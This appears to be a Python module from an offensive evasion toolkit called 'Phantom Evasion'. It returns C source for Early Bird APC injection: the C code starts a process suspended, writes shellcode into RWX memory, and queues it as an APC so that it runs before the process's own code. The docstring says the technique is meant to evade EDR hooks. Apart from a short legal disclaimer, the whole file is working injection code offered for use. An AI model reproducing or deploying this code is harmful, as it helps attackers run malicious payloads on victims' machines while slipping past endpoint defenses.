"""
Phantom Evasion - Early Bird APC Injection

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_early_bird_injection() -> Dict[str, Any]:
    """Generate C code for Early Bird APC injection.

    Early Bird creates a target process in a **suspended** state, queues an
    APC containing the shellcode before the process even starts its normal
    execution, then resumes. This evades many EDR products that only hook
    processes once their main thread is running.

    Steps:
        1. ``CreateProcess`` with ``CREATE_SUSPENDED``.
        2. ``VirtualAllocEx`` + ``WriteProcessMemory``.
        3. ``QueueUserAPC`` on the primary (suspended) thread.
        4. ``ResumeThread`` – APC fires before any user code runs.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
#ifndef __PHANTOM_EARLY_BIRD_DEFINED__
#define __PHANTOM_EARLY_BIRD_DEFINED__
// Early Bird APC Injection – generated by Phantom Evasion
// Layer 4 – Behavioral Evasion
// Creates a process suspended, queues shellcode APC, then resumes.
// Shellcode executes before the process main thread runs any user code.

#include <windows.h>

static BOOL early_bird_inject(const wchar_t *target_exe,
                               unsigned char *shellcode,
                               size_t shellcode_len) {
    STARTUPINFOW si = { .cb = sizeof(si) };
    PROCESS_INFORMATION pi = {0};

    // Create target process in suspended state
    if (!CreateProcessW(target_exe, NULL, NULL, NULL, FALSE,
                        CREATE_SUSPENDED | CREATE_NO_WINDOW,
                        NULL, NULL, &si, &pi)) {
        return FALSE;
    }

    // Allocate RWX in the new process before it runs
    LPVOID remote_addr = VirtualAllocEx(pi.hProcess, NULL, shellcode_len,
                                        MEM_COMMIT | MEM_RESERVE,
                                        PAGE_EXECUTE_READWRITE);
    if (!remote_addr) {
        TerminateProcess(pi.hProcess, 0);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
        return FALSE;
    }

    // Write shellcode
    SIZE_T written = 0;
    if (!WriteProcessMemory(pi.hProcess, remote_addr, shellcode,
                             shellcode_len, &written)) {
        VirtualFreeEx(pi.hProcess, remote_addr, 0, MEM_RELEASE);
        TerminateProcess(pi.hProcess, 0);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
        return FALSE;
    }

    // Queue APC to the (still-suspended) primary thread
    // The APC will execute before the process entry point when resumed
    if (!QueueUserAPC((PAPCFUNC)remote_addr, pi.hThread, 0)) {
        VirtualFreeEx(pi.hProcess, remote_addr, 0, MEM_RELEASE);
        TerminateProcess(pi.hProcess, 0);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
        return FALSE;
    }

    // Resume – APC fires immediately at alertable state in process startup
    ResumeThread(pi.hThread);

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return TRUE;
}
#endif /* __PHANTOM_EARLY_BIRD_DEFINED__ */
"""

    return {
        "code": code,
        "description": "Early Bird APC injection into suspended process before entry-point execution",
        "layer": "Layer 4 - Behavioral Evasion",
        "name": "early_bird",
    }
